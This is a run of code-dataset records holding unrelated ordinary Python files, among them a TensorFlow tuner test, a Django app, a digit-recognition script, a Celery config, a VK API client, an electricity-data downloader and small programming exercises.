tcu = TFConfigUtil(tfcm)\n\n gp = GPTrainingModel(tcu)\n gp.train(list_training_data)\n\n config_obj = gp.get_best_config()\n\n print(str(config_obj))\n\n print(\"Finish\")\n\n def test_get_lastest_training_data_group_by_ps_config(self):\n c1 = PSTunerConfiguration(\n num_ps=2,\n num_worker=2,\n inter_op_parallelism_threads=8,\n intra_op_parallelism_threads=8\n )\n c2 = PSTunerConfiguration(\n num_ps=1,\n num_worker=3,\n inter_op_parallelism_threads=14,\n intra_op_parallelism_threads=2\n )\n d1 = PSTunerTrainingData(\n ps_config=c1,\n elapsed_time_in_ms=1,\n loss=0.3,\n step=1\n )\n d2 = PSTunerTrainingData(\n ps_config=c1,\n elapsed_time_in_ms=2,\n loss=0.2,\n step=2\n )\n d3 = PSTunerTrainingData(\n ps_config=c2,\n elapsed_time_in_ms=3,\n loss=0.2,\n step=3\n )\n d4 = PSTunerTrainingData(\n ps_config=c2,\n elapsed_time_in_ms=3,\n loss=0.2,\n step=4\n )\n d5 = PSTunerTrainingData(\n ps_config=c1,\n elapsed_time_in_ms=1,\n loss=0.3,\n step=5\n )\n d6 = PSTunerTrainingData(\n ps_config=c1,\n elapsed_time_in_ms=2,\n loss=0.2,\n step=6\n )\n\n list_training_data = [d1,d2,d3,d4,d5,d6]\n ret = TFConfigUtil.get_lastest_training_data_group_by_ps_config(list_training_data)\n assert(len(ret[c1]) == 2)\n assert(len(ret[c2]) == 2)\n\n def eq_pstuner_config(self):\n c1 = PSTunerConfiguration(\n num_ps=2,\n num_worker=2,\n inter_op_parallelism_threads=8,\n intra_op_parallelism_threads=8\n )\n c2 = PSTunerConfiguration(\n num_ps=2,\n num_worker=2,\n inter_op_parallelism_threads=8,\n intra_op_parallelism_threads=8\n )\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',\n datefmt='%m-%d %H:%M',\n )\n unittest.main()","sub_path":"test/test_tuner.py","file_name":"test_tuner.py","file_ext":"py","file_size_in_byte":3725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"13983623","text":"# def mi_funcion(nS:int, nM:int, nW:int, wS:int, oS:int):\n# wS_perc = (wS/nS)*100\n# r_wSperc = round(wS_perc, 1)\n# oS_perc = (oS/nS)*100\n# r_oSperc = round(oS_perc, 1)\n# women_perc = (nW/nS)*100\n# r_wperc = round(women_perc, 1)\n# men_perc = (nM/nS)*100\n# r_mperc = round(men_perc, 1)\n# return(f\"Porcentaje de estudiantes que trabajan: {wS_perc}, Porcentaje de estudiantes que solo estudian: {oS_perc}, Porcentaje de mujeres es: {women_perc}, Porcentaje de hombres: {men_perc}\")\n# print(mi_funcion(8,4,4,3,5))\n\n# nS = int(input(\"Ingrese la cantidad de estudiantes de 
su grupo: \"))\n# nM = int(input(\"Del total, ¿cuántos son hombres?: \"))\n# nW = int(input(\"Del total, ¿cuántas son mujeres?: \"))\n# wS = int(input(\"Del total, ¿cuántos estudian y trabajan?: \"))\n# oS = int(input(\"Del total, ¿cuántos estudian solamente?: \"))\n# def mi_funcion(nS:int, nM:int, nW:int, wS:int, oS:int):\n# wS_perc = (wS/nS)*100\n# r_wSperc = round(wS_perc, 1)\n# oS_perc = (oS/nS)*100\n# r_oSperc = round(oS_perc, 1)\n# women_perc = (nW/nS)*100\n# r_wperc = round(women_perc, 1)\n# men_perc = (nM/nS)*100\n# r_mperc = round(men_perc, 1)\n# return(f\"Porcentaje de estudiantes que trabajan: {wS_perc}, Porcentaje de estudiantes que solo estudian: {oS_perc}, Porcentaje de mujeres es: {women_perc}, Porcentaje de hombres: {men_perc}\")\n# print(mi_funcion(nS, nM, nW, wS, oS))\n\n#Reto 1 grupo 85\n\ndef reto_1(F1:float, d:int, C1:float) -> str:\n R1 = (d/2)/100\n A1 = round((3.14*R1**2), 4)\n P1 = round((2*3.14*R1), 3)\n A2 = round(3.14*((R1*C1)**2), 4)\n F2 = (A2/A1)*F1\n F1 = f'F1 = {F1:.1F} N'\n A1 = f'A1 = {A1} m2'\n R1 = f'r1 = {R1} m2'\n P1 = f'P1 = {P1} m2'\n F2 = f'F2 = {F2:.1F} N'\n A2 = f'A2 = {A2} m2'\n return F1, A1, R1, P1, F2, A2\n\nprint(reto_1(-235, 345, 1/8))\n\n# def calculadoraRectangulo(ancho:float,largo:float)->str:\n# perimeter = 2*(ancho+ largo)\n# area = (ancho*largo)\n# return(f\"El cuadrado tiene un perimetro de: {perimeter} y un área de: {area}\")\n\n# print(calculadoraRectangulo(5.5, 3.5))","sub_path":"EJERCICIOS/RETO1.py","file_name":"RETO1.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"29056757","text":"import http.client\nimport uuid\nfrom header import header\n\nclass request:\n\n end_point = \"\"\n headers = []\n\n def get(self, service):\n\n print('### GET METHOD ###')\n print('end_point -> ' + self.end_point)\n print('service -> ' + service)\n print('##############################')\n print('##############################')\n\n headers = {\n 'authorization': \"D8199B61-CD5C-4837-8616-9A43B8103E5D\"\n }\n\n for currentHeader in headers:\n print('headers -> ' + currentHeader)\n\n conn = http.client.HTTPSConnection(self.end_point)\n\n conn.request(\"GET\", service, '', headers=headers)\n res = conn.getresponse()\n print('STATUS: {0} {1}'.format(res.status, res.reason))\n data = res.read()\n\n return data.decode(\"utf-8\")\n","sub_path":"request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"61078686","text":"from __future__ import print_function\nfrom multiprocessing.pool import ThreadPool\nimport cv2\nimport numpy as np\nfrom numpy.linalg import norm\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn import datasets, svm, metrics\nimport math\nimport pickle\nimport time\nimport datetime\nimport sys\n\nw_SZ = 10\nh_SZ = 20 \n\ndef deskew(img):\n m = cv2.moments(img)\n if abs(m['mu02']) < 1e-2:\n return img.copy()\n skew = m['mu11']/m['mu02']\n M = np.float32([[1, skew, -0.5*h_SZ*skew], [0, 1, 0]])\n img = cv2.warpAffine(img, M, (w_SZ, h_SZ), flags=cv2.WARP_INVERSE_MAP | cv2.INTER_LINEAR)\n return img\n\ndef preprocess_hog(digits):\n samples = []\n for img in digits:\n gx = cv2.Sobel(img, cv2.CV_32F, 1, 0)\n gy = cv2.Sobel(img, cv2.CV_32F, 0, 1)\n mag, ang = cv2.cartToPolar(gx, gy)\n bin_n = 16\n bin = np.int32(bin_n*ang/(2*np.pi))\n bin_cells = bin[:10,:5], 
bin[10:,:5], bin[:10,5:], bin[10:,5:]\n mag_cells = mag[:10,:5], mag[10:,:5], mag[:10,5:], mag[10:,5:]\n hists = [np.bincount(b.ravel(), m.ravel(), bin_n) for b, m in zip(bin_cells, mag_cells)]\n hist = np.hstack(hists)\n\n # transform to Hellinger kernel\n eps = 1e-7\n hist /= hist.sum() + eps\n hist = np.sqrt(hist)\n hist /= norm(hist) + eps\n\n samples.append(hist)\n return np.float32(samples)\n\ndef predictDigits(model, rectDigits):\n intDigits = list()\n for i in range(0,len(rectDigits)):\n digits = np.array(rectDigits[i])\n digits = digits.reshape(-1, h_SZ, w_SZ)\n digits = list(map(deskew, digits))\n digits = preprocess_hog(digits)\n intDigits.append(int(model.predict(digits)[0]))\n return intDigits\n\ndef set2float(intDigits):\n reading = 0\n qtd = len(intDigits)\n for i in range(0, qtd):\n reading += intDigits[(qtd-1)-i]*math.pow(10,i)\n return float(reading)/1000.0\n\ndef set2string(intDigits):\n reading = \"\"\n qtd = len(intDigits)\n for i in range(0, qtd):\n reading = str(reading) + str(intDigits[i])\n return reading\n\ndef send2file(utc, timestamp, reading, usage, dV, dt, Q, Qma, counter, path, file, mode):\n f = open(path+file, mode)\n line = str(utc)+\" \"+str(timestamp)+\" \"+str(reading)+\" \"+str(\"%8.3f\"%usage)\\\n +\" \"+str(\"%6.1f\"%dV)+\" \"+str(\"%4d\"%dt)+\" \"+str(\"%6.1f\"%Q)+\" \"+str(\"%8.1f\"%Qma)\\\n +\" \"+str(counter)+\"\\n\" \n f.write(line)\n f.close()\n return None\n\ndef recogNsave(MIN_dV, Qn, FoS, rectDigits, roiBGR, edges, rightSideUP, ROI_PATH, IMS_UPDATE_PATH,\\\n LOGFILE_PATH, METRICS_PATH, LEARNING_PATH, ML_CLASSIFIER, counter, debug):\n\n if ML_CLASSIFIER == 1:\n model=\"digits_svm.pkl\"\n if ML_CLASSIFIER == 2:\n model=\"digits_mlp.pkl\"\n if ML_CLASSIFIER == 3:\n model=\"digits_knn.pkl\"\n\n if sys.version_info >= (3,0):\n with open(LEARNING_PATH+model, \"rb\") as f:\n svmModel = pickle.load(f, encoding=\"latin1\")\n else:\n with open(LEARNING_PATH+model, \"rb\") as f:\n svmModel = pickle.load(f)\n\n intDigits = predictDigits(svmModel, rectDigits)\n reading = set2float(intDigits)\n strReading = set2string(intDigits)\n\n f = open(METRICS_PATH+\"prevHydroMetrics.var\",\"r\")\n lines = f.readlines()\n part = lines[0].split()\n prevTime = float(part[1])\n prevReading = float(part[3])\n prevQ = float(part[6])\n prevQa = float(part[7])\n f.close()\n\n if float(time.time()) > prevTime:\n\n utc = datetime.datetime.utcnow().strftime(\"%Y/%m/%d@%H:%M:%S\")\n timestamp = int(time.time())\n dV = (reading-prevReading)*1000 \n dt = float(time.time()-prevTime)\n Q = (float(dV)/dt)*3600\n Qma = float((Q + prevQ))/2.0 \n\n if reading > prevReading and dV >= MIN_dV and Q <= Qn*FoS:\n\n cv2.imwrite(IMS_UPDATE_PATH+\"roi.jpg\", rightSideUP, [cv2.IMWRITE_JPEG_QUALITY, 75])\n cv2.imwrite(IMS_UPDATE_PATH+\"digits.jpg\", edges, [cv2.IMWRITE_JPEG_QUALITY, 75])\n cv2.imwrite(ROI_PATH+str(timestamp)+\".jpg\",roiBGR, [cv2.IMWRITE_JPEG_QUALITY, 75])\n\n if debug:\n print (\"\")\n print (\" UTC = \", utc)\n print (\" Timestamp = \", timestamp)\n print (\" READING = \", strReading)\n print (\" Usage = \", \"%.3f\" %reading, \"m3\") \n print (\" dV = \", \"%.1f\" %dV, \"L\")\n print (\" dt = \", \"%d\" %dt, \"s\")\n print (\" Q = \", \"%.1f\" %Q, \"L/h\")\n print (\" Qma = \", \"%.1f\" %Qma, \"L/h\")\n print (\" Try = \", counter, \"x\")\n\n send2file(utc, timestamp, strReading, reading, dV, dt, Q, Qma, counter, METRICS_PATH, \"prevHydroMetrics.var\", \"w+\")\n send2file(utc, timestamp, strReading, reading, dV, dt, Q, Qma, counter, LOGFILE_PATH, \"hydrometer.log\", 
\"a+\")\n\n elif reading == prevReading:\n\n if debug:\n print (\"\")\n print (\" UTC = \", utc)\n print (\" Timestamp = \", timestamp)\n print (\" READING = \", strReading)\n print (\" Usage = \", \"%.3f\" %reading, \"m3\") \n print (\" dV = \", \"%.1f\" %dV, \"L\")\n print (\" dt = \", \"%d\" %dt, \"s\")\n print (\" Q = \", \"%.1f\" %Q, \"L/h\")\n print (\" Qma = \", \"%.1f\" %Qma, \"L/h\")\n print (\" Try = \", counter, \"x\")\n\n send2file(utc, timestamp, strReading, reading, dV, dt, Q, Qma, counter, METRICS_PATH, \"prevHydroMetrics.var\", \"w+\")","sub_path":"digitsRecognizer.py","file_name":"digitsRecognizer.py","file_ext":"py","file_size_in_byte":5682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"405072564","text":"from django.urls import include, path\r\nfrom . import views\r\n\r\nurlpatterns = [\r\n path(\"\", views.index, name = \"TribalHome\"), \r\n path(\"about/\",views.about, name = \"AboutUs\"),\r\n path(\"contact/\",views.contact, name = \"ContactUs\"),\r\n path(\"tracker/\",views.tracker, name = \"TrackingStatus\"),\r\n path(\"search/\",views.search, name = \"Search\"),\r\n path(\"productview/\",views.prodView, name = \"ProductView\"),\r\n path(\"checkout\",views.checkout, name = \"checkout\"),\r\n]","sub_path":"tribal/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"244009889","text":"# Reddit /r/dailyprogrammer Challenge #330 Easy Without Bonus\n\ndef get_input():\n \"\"\"\n Get comma separated coordinates from the user.\n \"\"\"\n print(\"Please enter comma separated coordinates:\")\n lines = []\n while True:\n line = input()\n if line:\n line = [float(x) for x in line.replace(\" \", \"\").split(\",\")]\n lines.append(line)\n else:\n break\n return lines\n\ndef get_bounds(circle):\n \"\"\"\n Return 4 bounding coordinates of a circle parallel to the axes.\n \"\"\"\n x_low = circle[0] - circle[2]\n y_low = circle[1] - circle[2]\n x_high = circle[0] + circle[2]\n y_high = circle[1] + circle[2]\n return x_low, y_low, x_high, y_high\n\ndef get_rectangle_coordinates(circles):\n \"\"\"\n Return the min and max x and y coordinates of the rectangle.\n \"\"\"\n x_min, y_min, x_max, y_max = 0., 0., 0., 0.\n for circle in circles:\n x_low, y_low, x_high, y_high = get_bounds(circle)\n x_min = min(x_min, x_low)\n y_min = min(y_min, y_low)\n x_max = max(x_max, x_high)\n y_max = max(y_max, y_high)\n return (x_min, y_min, x_max, y_max)\n\ndef print_rectangle_coordinates(solution):\n \"\"\"\n Print the coordinates to the bounding rectangle.\n \"\"\"\n print('({:.3f}, {:.3f}), ({:.3f}, {:.3f}), ({:.3f}, {:.3f}), ({:.3f}, {:.3f})'\\\n .format(solution[0], solution[1], solution[0], solution[3],\\\n solution[2], solution[3], solution[2], solution[1]))\n\n\nif __name__ == \"__main__\":\n circles = get_input()\n solution = get_rectangle_coordinates(circles)\n print_rectangle_coordinates(solution)\n\n","sub_path":"challenge#330easy/basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"264664199","text":"from __future__ import unicode_literals\nimport importlib\nfrom goerr import err\nfrom django.apps import AppConfig\nfrom chartflo.engine import ChartFlo\n\n\nGENERATORS = {}\ncf = ChartFlo()\n\n\ndef load_generator(modname, subgenerator=None):\n try:\n path = modname + \".chartflo\"\n if 
subgenerator is not None:\n path = path + \".\" + subgenerator\n mod = importlib.import_module(path)\n generator = getattr(mod, \"run\")\n return generator\n except ImportError as e:\n if \"No module named\" not in str(e):\n err.new(e)\n return None\n except Exception as e:\n err.new(e, load_generator, \"Error loading module\")\n\n\nclass ChartfloConfig(AppConfig):\n name = 'chartflo'\n verbose_name = \"Chartflo\"\n\n def ready(self):\n \"\"\"\n Load generators and initialize class instance\n \"\"\"\n global GENERATORS, cf\n from django.conf import settings\n apps = settings.INSTALLED_APPS\n generators = {}\n for app in apps:\n try:\n res = load_generator(app)\n if res is not None:\n generators[app] = res\n except Exception as e:\n err.new(e, self.ready,\n \"Can not initialize Chartflo generators\")\n GENERATORS = generators\n if err.exists:\n err.trace()\n","sub_path":"chartflo/apps.py","file_name":"apps.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"23586540","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\n\n# HTTP GET request for the emoji page\nEMOJI_URL = 'https://unicode.org/emoji/charts/full-emoji-list.html'\npage = requests.get(EMOJI_URL)\n\n# Conversion to BeautifulSoup so we can query the page elements\nsoup = BeautifulSoup(page.content, 'html.parser')\n\n# Query structure to obtain the emoji, the emoji name (in English, as given by the site), and its unicode code\nresponse = soup.find_all(\"td\", class_=\"rchars\")\n\nwith open(\"./emojis\", \"w\") as listaEmojis:\n for em in response:\n parent = em.find_parent()\n\n # Emoji\n listaEmojis.write(parent.find(\n 'td', class_=\"chars\").contents[0] + \" \")\n\n # Emoji Name\n listaEmojis.write(parent.find(\n 'td', class_=\"name\").contents[0].title() + \" \")\n\n # Emoji ASCII\n listaEmojis.write(parent.find('td', class_=\"code\").find(\n 'a').contents[0] + \"\\n\")\n\n# Program complete\ninput(\"[Scraping complete]\")\n","sub_path":"webScraper.py","file_name":"webScraper.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"285488176","text":"from django.contrib.auth.models import AnonymousUser\nfrom django.test import TestCase\n\nfrom accounts.models import User\nfrom accounts.templatetags.accounts import js_user\n\n\nclass AccountExtrasTestCase(TestCase):\n\n @staticmethod\n def generate_json(user_id, username='taavi', email='', name=''):\n return '{id:%s,username:\"%s\",email:\"%s\",name:\"%s\"}' % (\n user_id, username, email, name,\n )\n\n def test_js_user(self):\n user = User.objects.create_user('taavi')\n result = js_user(user)\n self.assertEqual(result, self.generate_json(user.id))\n\n user.email = 'taavi@test.com'\n result = js_user(user)\n self.assertEqual(result, self.generate_json(user.id, email='taavi@test.com'))\n\n user.name = 'Taavi Teska'\n result = js_user(user)\n self.assertEqual(result, self.generate_json(user.id, email='taavi@test.com', name='Taavi Teska'))\n\n user.name = '\" \\' \\\\ Teska'\n result = js_user(user)\n self.assertEqual(result, self.generate_json(\n user.id, email='taavi@test.com', name='\\\\u0022 \\\\u0027 \\\\u005C Teska',\n ))\n\n # Try to save the user - we should not get any errors\n user.save()\n\n def test_js_user_anonymous(self):\n user = AnonymousUser()\n\n result = js_user(user)\n self.assertEqual(result, 'null')\n\n def 
test_js_user_safe_string(self):\n user = User.objects.create_user('taavi')\n result = js_user(user)\n self.assertEqual(result, result.__html__())\n\n user = AnonymousUser()\n result = js_user(user)\n self.assertEqual(result, result.__html__())\n","sub_path":"{{cookiecutter.repo_name}}/{{cookiecutter.repo_name}}/accounts/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"424855130","text":"from environments.box2d_environment import Box2dEnvironment\nfrom agents.policy_gradient_agent import *\n\nN_TRAINING_EPISODES = 10\n\nenv = Box2dEnvironment(\"LunarLander-v2\")\nhistory = EpisodeHistory()\nagent = PolicyGradientAgent(env.get_state_dims(), env.get_n_actions())\n\nfor i in range(N_TRAINING_EPISODES):\n \n s0 = env.reset()\n done = False\n\n while not done:\n a = agent.choose_action(s0)\n a, s1, r, done = env.step(a)\n history.push(s0, a, r)\n s0 = s1\n\n train_s, train_a, train_r = history.flush()\n agent.train(train_s, train_a, None, train_r, None)\n","sub_path":"policy_gradient.py","file_name":"policy_gradient.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"520411567","text":"\nimport subprocess\nimport time\n\ndef parseLine(line):\n '''parse a line of gprof output (from the flat profiler), return a\n dictionary with the function's name, the percent of time spent in it, total\n time spent there, total time excluding subroutines, and number of calls'''\n\n line = line.strip()\n\n data = {}\n colNames = ['percent', 'total', 'self', 'calls']\n\n # parse each column\n i = 0\n for col in range(6):\n\n # parse a whitespace separated entry\n num = \"\"\n while i < len(line) and (line[i].isdigit() or line[i] == '.'):\n num += line[i]\n i += 1\n \n while i < len(line) and line[i].isspace():\n i += 1\n \n # if the format was incorrect, return None\n if len(num) == 0:\n return None\n \n # cast numeric columns to float\n if col < 4:\n data[colNames[col]] = float(num)\n \n # the remainder of the line is the name\n data['name'] = line[i:]\n\n return data\n\ndef getFunction(funcInfo, name):\n '''get the information for a specific function; a subsection of the name\n sufficient to uniquely identify the function must be provided'''\n\n for fi in funcInfo:\n try:\n fi['name'].index(name)\n return fi\n except ValueError:\n pass\n\ndef getTopFunctions(fi, n = 5):\n '''Get the n functions that took the greatest portion of processing time'''\n\n fi.sort(key = lambda s: s['self'], reverse=True)\n if len(fi) < n:\n return fi\n \n return fi[:n]\n\ndef perfTest(E, s, M):\n '''perform a single performance test with E events, s sections per event,\n and M schedules considered; return the parsed gprof output'''\n\n # run the program\n testProcess = subprocess.Popen(['./exe/EventSchedulerPerfTest', str(E), str(s), str(M)], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n testProcess.wait()\n\n # run gprof\n gprofProcess = subprocess.Popen(['gprof', 'exe/EventSchedulerPerfTest', '--flat-profile'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n subStdout, subStderr = gprofProcess.communicate()\n\n # parse gprof output\n funcInfo = []\n lines = subStdout.decode('utf-8').split('\\n')\n for line in lines:\n fInfo = parseLine(line)\n if fInfo is not None:\n funcInfo.append(fInfo)\n\n return funcInfo\n\ndef timeTest(E, s, M):\n '''Test the total (real) time taken to execute the scheduling 
program'''\n\n t0 = time.time() # start timer\n\n # run the scheduling program\n testProcess = subprocess.Popen(['./exe/EventSchedulerPerfTest', str(E), str(s), str(M)], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n testProcess.wait()\n\n totalTime = time.time() - t0 # end timer\n\n return totalTime\n\ndef runTimingTests(tests):\n '''run multiple timing tests and print the results in a table'''\n\n print(\"E\\ts\\tM\\ttime (s)\")\n\n for test in tests:\n t = timeTest(test[0], test[1], test[2])\n print(test[0], test[1], test[2], t, sep=\"\\t\")\n\ndef runTopFunctions(tests):\n '''run multiple timing tests and print the top 5 costliest functions for\n each test'''\n\n for test in tests:\n print(f\"E = {test[0]}, s = {test[1]}, M = {test[2]}\")\n results = perfTest(test[0], test[1], test[2])\n results = getTopFunctions(results)\n for result in results:\n print('\\t', result)\n\ndef runFunctionAnalysis(tests, funcName):\n '''run multiple tests and extract the time spent in a particular function\n for each test; print the results in a table'''\n\n print(\"E\\ts\\tM\\ttotal\\t%\\tcalls\")\n for test in tests:\n results = perfTest(test[0], test[1], test[2])\n results = getFunction(results, funcName)\n print(test[0], test[1], test[2], results['self'], results['percent'], results['calls'], sep='\\t')\n\n\n# default set of tests that vary E, s, and M\ntests = [\n [100, 5, 1000],\n [200, 5, 1000],\n [400, 5, 1000],\n [800, 5, 1000],\n [100, 10, 1000],\n [100, 20, 1000],\n [100, 40, 1000],\n [100, 80, 1000],\n [100, 5, 2000],\n [100, 5, 4000],\n [100, 5, 8000],\n [100, 5, 16000],\n]\n\nrunTimingTests(tests)\n#runTopFunctions(tests)\n#runFunctionAnalysis(tests, 'sectionConflictsWithSchedule')","sub_path":"src/PerfAnalysis.py","file_name":"PerfAnalysis.py","file_ext":"py","file_size_in_byte":4239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"328438184","text":"freq = dict()\nsmallest = dict()\n\ni = 1\nwhile True:\n r = tuple(sorted(list(str(i*i*i))))\n\n if r not in freq:\n smallest[r] = i\n freq[r] = 0\n\n freq[r] += 1\n if freq[r] == 5:\n print(smallest[r]**3)\n break\n\n i += 1\n","sub_path":"euler062.py","file_name":"euler062.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"441390065","text":"from __future__ import absolute_import\n\nfrom datetime import timedelta\nfrom celery.schedules import crontab\n#BROKER_URL = \"redis://10.1.9.9:6379\"\nBROKER_URL = \"redis://127.0.0.1:6379\"\n#CELERY_RESULT_BACKEND = \"redis://10.1.9.9:6379\"\nCELERY_RESULT_BACKEND = \"redis://127.0.0.1:6379\"\nCELERY_ENABLE_UTC = True\nCELERY_TIMEZONE = 'Asia/Shanghai'\nCELERY_TASK_RESULT_EXPIRES = 8 * 24 * 60 * 60 # expire task in 8 days\nCELERY_TRACK_STARTED = True\n\nCELERY_IMPORTS = (\"proj.tasks\",)\n\nCELERYD_TASK_TIME_LIMIT = 3600 # one hour\nCELERYD_TASK_SOFT_TIME_LIMIT = 1800 # half an hour\n\nCELERY_STORE_ERRORS_EVEN_IF_IGNORED = True\n\nCELERY_SEND_TASK_ERROR_EMAILS = False\nADMINS = (\n (\"wangdapeng\", \"wangdapeng@jike.com\"),\n (\"guoshaosong\", \"guoshaosong@jike.com\"),\n (\"liwei\", \"liwei@jike.com\"),\n)\n\nSERVER_EMAIL = \"testsinaweiboapi@gmail.com\"\n\nEMAIL_HOST = \"smtp.gmail.com\"\nEMAIL_PORT = 25\n\nCELERYBEAT_SCHEDULE = {\n 'task_add_periodic' : {\n 'task' : 'proj.tasks.add',\n 'schedule' : timedelta(seconds=2),\n 'args' : (16, 16)\n 
},\n}\n","sub_path":"python/gevent/celery/celery_user/proj/celery_config.py","file_name":"celery_config.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"303513130","text":"import requests\nfrom . import VkApi\nfrom datetime import datetime\n\nfrom wtflog import warden\nlogger = warden.get_boy('VK LongPoll')\n\nclass LP():\n key: str\n server:str\n ts: int\n time: float\n vk: VkApi\n wait: int\n\n def __init__(self, vk, wait = 25):\n 'vk - a VkApi instance'\n self.vk = vk\n data = vk('messages.getLongPollServer')\n if data.get('error'):\n if data['error']['error_code'] == 5:\n raise Exception('tokenfail')\n self.server = data['server']\n self.key = data['key']\n self.ts = data['ts']\n self.wait = wait\n\n @property\n def check(self):\n 'Returns the list of events (updates)'\n response = requests.get(f\"http://{self.server}?act=a_check&key={self.key}&ts={self.ts}&wait={self.wait}&version=3&mode=2\")\n\n if response.status_code != 200:\n logger.error('Network error')\n return []\n\n self.time = datetime.now().timestamp()\n data = response.json()\n\n if 'failed' in data.keys():\n if data['failed'] == 1:\n logger.error('Event history error')\n self.ts = data['ts']\n elif data['failed'] == 2:\n self.key = self.vk('messages.getLongPollServer')['key']\n else:\n raise Exception('User information has been lost')\n return []\n else:\n self.ts = data['ts']\n return data['updates']\n","sub_path":"microvk/user_longpoll.py","file_name":"user_longpoll.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"525686546","text":"from model.contact import Contact\nimport random\n\n\ndef test_delete_first_contact(app, db):\n if len(db.get_contact_list()) == 0:\n app.contact.create(Contact(firstname=\"test\", lastname=\"test\", address=\"fgd\", email=\"agnieszka@agnieszka.pl\",\n homephone=\"34242\", mobilephone=\"3244\", workphone=\"34245\", secondaryphone=\"334234\"))\n old_contacts = db.get_contact_list()\n contact = random.choice(old_contacts)\n app.contact.delete_contact_by_id(contact.id)\n new_contacts = db.get_contact_list()\n assert len(old_contacts) - 1 == len(new_contacts)\n old_contacts.remove(contact)\n assert old_contacts == new_contacts\n\n\n","sub_path":"test/test_del_contact.py","file_name":"test_del_contact.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"616033408","text":"#!/usr/bin/python3\nimport argparse\nimport requests\nfrom datetime import timedelta, datetime\nimport pandas as pd\nfrom pandas import json_normalize\nimport json\n\ndef daterange(start_date, end_date):\n for n in range(int ((end_date - start_date).days)):\n yield start_date + timedelta(n)\n\nwith open('places.json', 'r') as fp:\n loc_dict = json.load(fp)\n\nparser = argparse.ArgumentParser(description='Place to get the data: Peninsula \\n IslasBaleares \\n Mallorca \\n Menorca \\n Ibiza \\n Formentera \\n Tenerife \\n ElHierro \\n GranCanaria \\n Lanzarote-Fuerteventura \\n Fuerteventura \\n LaGomera \\n Lanzarote \\n LaPalma')\nparser.add_argument('-p', '--place', type=str, required=True, help='Place to get the data: Peninsula \\n IslasBaleares \\n Mallorca \\n Menorca \\n Ibiza \\n Formentera \\n Tenerife \\n ElHierro \\n GranCanaria \\n Lanzarote-Fuerteventura \\n Fuerteventura \\n LaGomera \\n Lanzarote \\n 
LaPalma')\nparser.add_argument('-sd', '--start_date', required=True, type=lambda s: datetime.strptime(s, '%Y-%m-%d'), help='Place the start date: YYYY-MM-DD')\nparser.add_argument('-ed', '--end_date', required=True, type=lambda s: datetime.strptime(s, '%Y-%m-%d'), help='Place to end date')\nparser.add_argument('-o', '--opt', type=int, required=True, help='0=Consumtion, 1=Forecast')\nargs = parser.parse_args()\n\ndef download_data(place, start_date, end_date, opt):\n url = loc_dict['loc_dict'].get(place)[opt]\n for single_date in daterange(start_date, end_date):\n address = url + \"{}\".format(single_date.strftime(\"%Y-%m-%d\"))\n try:\n r = str(requests.get(address).content)\n except:\n pass\n inicial = r.find(\"{\")\n #Json file\n #f=open(\"{}.json\".format(single_date.strftime(\"%Y-%m-%d\")),\"w\")\n f=open(\"temp.json\",\"w\")\n f.write(r[inicial:-3])\n f.close()\n\n df = pd.read_json('temp.json')\n #print(json_normalize(df['valoresHorariosGeneracion']))\n json_normalize(df['valoresHorariosGeneracion']).to_csv(\"{}.csv\".format(single_date.strftime(\"%Y-%m-%d\")))\n\n\n# python main.py Peninsula 2020-02-10 2020-03-05 0\n# python main.py Mallorca 2020-02-10 2020-03-05 1\nif __name__ == '__main__':\n try:\n download_data(args.place, args.start_date, args.end_date, args.opt)\n except IndexError:\n print(\"No se puede hayar\")\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"450513877","text":"# Copyright (c) 2020 by Fraunhofer Institute for Energy Economics\n# and Energy System Technology (IEE), Kassel. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be found in the LICENSE file.\n\nfrom pandapipes.component_models.auxiliaries.component_toolbox import init_results_element\n\ntry:\n from numba import jit\nexcept ImportError:\n from pandapower.pf.no_numba import jit\n\ntry:\n import pplog as logging\nexcept ImportError:\n import logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass Component:\n \"\"\"\n\n 